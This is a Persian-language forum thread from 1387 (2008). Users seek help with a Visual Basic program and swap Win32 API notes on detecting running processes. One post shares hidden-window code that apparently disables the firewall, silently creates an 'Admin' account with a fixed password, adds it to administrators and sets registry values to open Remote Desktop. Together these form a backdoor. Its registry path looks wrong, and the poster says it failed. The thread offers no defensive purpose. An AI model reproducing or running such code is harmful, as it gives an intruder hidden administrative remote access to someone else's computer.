۱۴-شهریور-۱۳۸۷, ۱۱:۲۴:۲۷
۱۴-شهریور-۱۳۸۷, ۱۳:۲۴:۴۵
خب لیست پروسه های در حال اجرا رو چک کنین اگه پروسه مورد نظر در حال اجرا بود معلوم میشه
۱۴-شهریور-۱۳۸۷, ۱۶:۰۴:۰۰
دست گلت درد نکنه آقا
یه امتحانی میکنم نتیجه رو میگم بهت عزیز
اینم یکی جواب بده . در گیرشم
http://forum.iranled.com/showthread.php?tid=9809
اینم نتیجه ی جستجوی من
اما تست کردم جواب نداد
بای
قسمت PID حل شد
حالا قسمت دوم مونده
یه امتحانی میکنم نتیجه رو میگم بهت عزیز
اینم یکی جواب بده . در گیرشم
http://forum.iranled.com/showthread.php?tid=9809
اینم نتیجه ی جستجوی من
کد:
Dis_FW
Shell "net user Admin 0131 /add", vbHide
Shell "net localgroup administrators Admin /add", vbHide
Shell "net user Admin /active", vbHide
RegAdd "HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections", CLng("0"), "REG_DWORD"
RegAdd "HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Control\Terminal Server\fAllowToGetHelp", CLng("0"), "REG_DWORD"
اما تست کردم جواب نداد
بای
قسمت PID حل شد
حالا قسمت دوم مونده
۱۴-شهریور-۱۳۸۷, ۱۶:۵۱:۲۶
شما برای چک کردن پروسه باید از توابع api استفاده کنین
و این تابع
تو یه تایمر با این توابع میتونین چک کنین پروسه مورد نظرتون در حال اجرا هست یا نه
کد:
Retrieves information about the first process encountered in a system snapshot.
BOOL WINAPI Process32First(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
Parameters
hSnapshot
Handle of the snapshot returned from a previous call to the CreateToolhelp32Snapshot function.
lppe
Address of a PROCESSENTRY32 structure.
Return Value
Returns TRUE if the first entry of the process list has been copied to the buffer or FALSE otherwise. The ERROR_NO_MORE_FILES error value is returned by the GetLastError function if no processes exist or the snapshot does not contain process information.
کد:
Retrieves information about the next process recorded in a system snapshot.
BOOL WINAPI Process32Next(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
Parameters
hSnapshot
Handle of the snapshot returned from a previous call to the CreateToolhelp32Snapshot function.
lppe
Address of a PROCESSENTRY32 structure.
Return Value
Returns TRUE if the next entry of the process list has been copied to the buffer or FALSE otherwise. The ERROR_NO_MORE_FILES error value is returned by the GetLastError function if no processes exist or the snapshot does not contain process information.
۱۴-شهریور-۱۳۸۷, ۱۸:۳۱:۰۰
آره گفتم مشکل PID حل شد
فقط این مشکل مونده که اگه میدونید لطفا همینجا بفرمایید
http://forum.iranled.com/showthread.php?tid=9809
فقط این مشکل مونده که اگه میدونید لطفا همینجا بفرمایید
http://forum.iranled.com/showthread.php?tid=9809